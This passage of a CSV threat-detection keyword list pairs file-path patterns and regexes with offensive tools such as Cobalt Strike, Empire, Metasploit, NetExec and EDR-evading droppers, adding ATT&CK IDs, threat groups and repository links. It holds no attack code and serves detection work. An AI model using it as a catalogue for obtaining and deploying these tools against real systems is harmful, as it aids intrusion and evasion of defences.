TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","223","41","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" "*/email_spoof_checks.txt*",".{0,1000}\/email_spoof_checks\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a 
reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "*/EmailAll.git*",".{0,1000}\/EmailAll\.git.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","7","627","110","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "*/emailall.py*",".{0,1000}\/emailall\.py.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","7","627","110","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "*/EmbedInHTML.git*",".{0,1000}\/EmbedInHTML\.git.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*/EmbedInHTML/*",".{0,1000}\/EmbedInHTML\/.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*/emotet.profile*",".{0,1000}\/emotet\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/Empire.git",".{0,1000}\/Empire\.git","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 
- T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/empire/client/*",".{0,1000}\/empire\/client\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - 
WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/empire:latest*",".{0,1000}\/empire\:latest.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/empire_exec.py*",".{0,1000}\/empire_exec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/EmpireProject*",".{0,1000}\/EmpireProject.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","1","N/A","10","10","483","144","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" "*/enable_all_tokens.exe*",".{0,1000}\/enable_all_tokens\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/EnableAllTokenPrivs.exe*",".{0,1000}\/EnableAllTokenPrivs\.exe.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","1","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*/EnableAllTokenPrivs.git*",".{0,1000}\/EnableAllTokenPrivs\.git.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","1","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*/EnableAllTokenPrivs.ps1*",".{0,1000}\/EnableAllTokenPrivs\.ps1.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","1","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*/enable-user.py*",".{0,1000}\/enable\-user\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/enableuser/enableuser.x64.*",".{0,1000}\/enableuser\/enableuser\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" 
"*/enableuser/enableuser.x86.*",".{0,1000}\/enableuser\/enableuser\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/enc_shellcode.bin*",".{0,1000}\/enc_shellcode\.bin.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*/enc_shellcode.h*",".{0,1000}\/enc_shellcode\.h.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as 
shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*/encryption_aes.exe*",".{0,1000}\/encryption_aes\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/encryption_rc4.exe*",".{0,1000}\/encryption_rc4\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/enip-info.nse*",".{0,1000}\/enip\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/enum__secrets/*.py*",".{0,1000}\/enum__secrets\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/enum_av.md*",".{0,1000}\/enum_av\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/enum_av.py*",".{0,1000}\/enum_av\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/enum_av.py*",".{0,1000}\/enum_av\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/enum_cisco.md*",".{0,1000}\/enum_cisco\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/enum_dns.py*",".{0,1000}\/enum_dns\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/enum_domain_info*",".{0,1000}\/enum_domain_info.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/enum_f5.md*",".{0,1000}\/enum_f5\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/enum_juniper.md*",".{0,1000}\/enum_juniper\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/enum_osx.md*",".{0,1000}\/enum_osx\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/enum_proxy.md*",".{0,1000}\/enum_proxy\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/enum_services.md*",".{0,1000}\/enum_services\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/enum_shares.*",".{0,1000}\/enum_shares\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/enum_snmp.md*",".{0,1000}\/enum_snmp\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/enum4linux.py*",".{0,1000}\/enum4linux\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/EnumCLR.c*",".{0,1000}\/EnumCLR\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
